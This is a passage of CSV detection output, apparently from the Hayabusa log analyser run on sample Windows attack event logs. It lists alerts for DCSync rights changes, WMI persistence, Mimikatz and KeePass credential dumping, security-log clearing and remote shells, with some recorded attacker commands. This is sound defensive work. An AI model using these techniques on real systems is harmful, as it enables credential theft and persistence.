Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx -2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx -2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx -2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx -2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx -2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 